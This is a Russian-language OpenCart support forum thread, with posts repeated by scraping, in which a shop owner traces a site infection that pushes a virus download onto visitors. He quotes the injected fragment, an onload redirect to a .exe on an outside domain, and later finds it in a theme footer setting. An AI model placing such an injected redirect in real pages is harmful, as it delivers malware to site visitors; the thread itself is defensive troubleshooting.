esculapra Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 (изменено) 10.10.2022 в 13:12, SSHEVA сказал: Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК Я еще не успел этого написать. Да, если на сайте плотно поковырялись, то антивирус реально найдет. Айболит должен был найти, но видимо там нет явного кода. Можно попробовать параноидальный режим. Хотя, если это в картинках то может не найти - проще посмотреть исходный код страницы и какие картинки подключаются, а потом сравнить их по времени создания. Картинки также могут подключаться через стили, но тут откат бы все исправил. Изменено 10 октября 2022 пользователем esculapra Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 ссыль на файл прям в боди вставляется, скачиваю файлы сайта на компьютер чтоб сканировать. Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... SSHEVA Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 16:44, borborich сказал: ссыль на файл прям в боди вставляется, скачиваю файлы сайта на компьютер чтоб сканировать. После проверки антивирусов, если что еще проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еще Поиск использовать в редакторе. Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 15:54, SSHEVA сказал: После проверки антивирусов, если что еще проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еще Поиск использовать в редакторе. спасибо, собственно для этого и скачиваю Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 11 октября 2022 Автор Поделиться Опубликовано: 11 октября 2022 Антивирус ни чего не находит в файлах, попытки найти в файлах какую либо часть этого хвоста onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';"> дают ноль результатов Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... SSHEVA Опубликовано: 11 октября 2022 Поделиться Опубликовано: 11 октября 2022 11.10.2022 в 12:18, borborich сказал: Антивирус ни чего не находит в файлах, попытки найти в файлах какую либо часть этого хвоста onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';"> дают ноль результатов Тогда нужно смотреть уже сайт, так вслепую сложно сказать Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 11 октября 2022 Автор Поделиться Опубликовано: 11 октября 2022 Нашелся в конфигах подвала newstore, теперь бы понять как он туда попал и как этого избежать@29aleksey есть предположения? Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... 29aleksey Опубликовано: 11 октября 2022 Поделиться Опубликовано: 11 октября 2022 В настройки шаблона в поле код счетчика прописывается только с админки Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 12 октября 2022 Автор Поделиться Опубликовано: 12 октября 2022 11.10.2022 в 20:38, 29aleksey сказал: В настройки шаблона в поле код счетчика прописывается только с админки подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... Ecolotos Опубликовано: 18 октября 2022 Поделиться Опубликовано: 18 октября 2022 В 12.10.2022 в 15:48, borborich сказав: подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда Звучит это все как фантастика Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... Создайте аккаунт или войдите в него для комментирования Вы должны быть пользователем, чтобы оставить комментарий Создать аккаунт Зарегистрируйтесь для получения аккаунта. Это просто! Зарегистрировать аккаунт Войти Уже зарегистрированы? Войдите здесь. Войти сейчас Поделиться Больше способов поделиться... Подписчики 5 Перейти к списку тем Похожие публикации Вирус Автор: Magazinufedora, 20 декабря 2022 2 ответа 127 просмотров esculapra 20 декабря 2022 Кто может почистить сайт от вирусов и удалить ненужные файлы и папки? Автор: PRONTO, 27 ноября 2022 1 ответ 155 просмотров buslikdrev 27 ноября 2022 Вирус image.php в корне и /admin/ Автор: aksen87, 5 ноября 2022 3 ответа 393 просмотра markimax 21 ноября 2022 Как сделать закрытую инфу для покупателей, но открытую для продавцов магазина? Автор: alinalessioYandex, 21 декабря 2022 1 ответ 148 просмотров spectre 21 декабря 2022 Настройка сервера и удаление вирусов Автор: tehnomad, 18 октября 2022 2 ответа 694 просмотра WarStyle 19 октября 2022 Сейчас на странице 0 пользователей Нет пользователей, просматривающих эту страницу. Последние темы Последние дополнения Последние новости Вся активность Главная Opencart 2.x Opencart 2.x: Общие вопросы Вирус закачивается на компьютер при открытии сайта
borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 ссыль на файл прям в боди вставляется, скачиваю файлы сайта на компьютер чтоб сканировать. Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться...
SSHEVA Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 16:44, borborich сказал: ссыль на файл прям в боди вставляется, скачиваю файлы сайта на компьютер чтоб сканировать. После проверки антивирусов, если что еще проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еще Поиск использовать в редакторе. Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться...
borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 15:54, SSHEVA сказал: После проверки антивирусов, если что еще проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еще Поиск использовать в редакторе. спасибо, собственно для этого и скачиваю Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться...
borborich Опубликовано: 11 октября 2022 Автор Поделиться Опубликовано: 11 октября 2022 Антивирус ни чего не находит в файлах, попытки найти в файлах какую либо часть этого хвоста onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';"> дают ноль результатов Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться...
SSHEVA Опубликовано: 11 октября 2022 Поделиться Опубликовано: 11 октября 2022 11.10.2022 в 12:18, borborich сказал: Антивирус ни чего не находит в файлах, попытки найти в файлах какую либо часть этого хвоста onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';"> дают ноль результатов Тогда нужно смотреть уже сайт, так вслепую сложно сказать Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться...
borborich Опубликовано: 11 октября 2022 Автор Поделиться Опубликовано: 11 октября 2022 Нашелся в конфигах подвала newstore, теперь бы понять как он туда попал и как этого избежать@29aleksey есть предположения? Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться...
29aleksey Опубликовано: 11 октября 2022 Поделиться Опубликовано: 11 октября 2022 В настройки шаблона в поле код счетчика прописывается только с админки Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 12 октября 2022 Автор Поделиться Опубликовано: 12 октября 2022 11.10.2022 в 20:38, 29aleksey сказал: В настройки шаблона в поле код счетчика прописывается только с админки подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... Ecolotos Опубликовано: 18 октября 2022 Поделиться Опубликовано: 18 октября 2022 В 12.10.2022 в 15:48, borborich сказав: подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда Звучит это все как фантастика Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... Создайте аккаунт или войдите в него для комментирования Вы должны быть пользователем, чтобы оставить комментарий Создать аккаунт Зарегистрируйтесь для получения аккаунта. Это просто! Зарегистрировать аккаунт Войти Уже зарегистрированы? Войдите здесь. Войти сейчас Поделиться Больше способов поделиться... Подписчики 5 Перейти к списку тем Похожие публикации Вирус Автор: Magazinufedora, 20 декабря 2022 2 ответа 127 просмотров esculapra 20 декабря 2022 Кто может почистить сайт от вирусов и удалить ненужные файлы и папки? Автор: PRONTO, 27 ноября 2022 1 ответ 155 просмотров buslikdrev 27 ноября 2022 Вирус image.php в корне и /admin/ Автор: aksen87, 5 ноября 2022 3 ответа 393 просмотра markimax 21 ноября 2022 Как сделать закрытую инфу для покупателей, но открытую для продавцов магазина? Автор: alinalessioYandex, 21 декабря 2022 1 ответ 148 просмотров spectre 21 декабря 2022 Настройка сервера и удаление вирусов Автор: tehnomad, 18 октября 2022 2 ответа 694 просмотра WarStyle 19 октября 2022 Сейчас на странице 0 пользователей Нет пользователей, просматривающих эту страницу.
borborich Опубликовано: 12 октября 2022 Автор Поделиться Опубликовано: 12 октября 2022 11.10.2022 в 20:38, 29aleksey сказал: В настройки шаблона в поле код счетчика прописывается только с админки подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться...
Ecolotos Опубликовано: 18 октября 2022 Поделиться Опубликовано: 18 октября 2022 В 12.10.2022 в 15:48, borborich сказав: подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда Звучит это все как фантастика Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... Создайте аккаунт или войдите в него для комментирования Вы должны быть пользователем, чтобы оставить комментарий Создать аккаунт Зарегистрируйтесь для получения аккаунта. Это просто! Зарегистрировать аккаунт Войти Уже зарегистрированы? Войдите здесь. Войти сейчас Поделиться Больше способов поделиться... Подписчики 5
Рекомендованные сообщения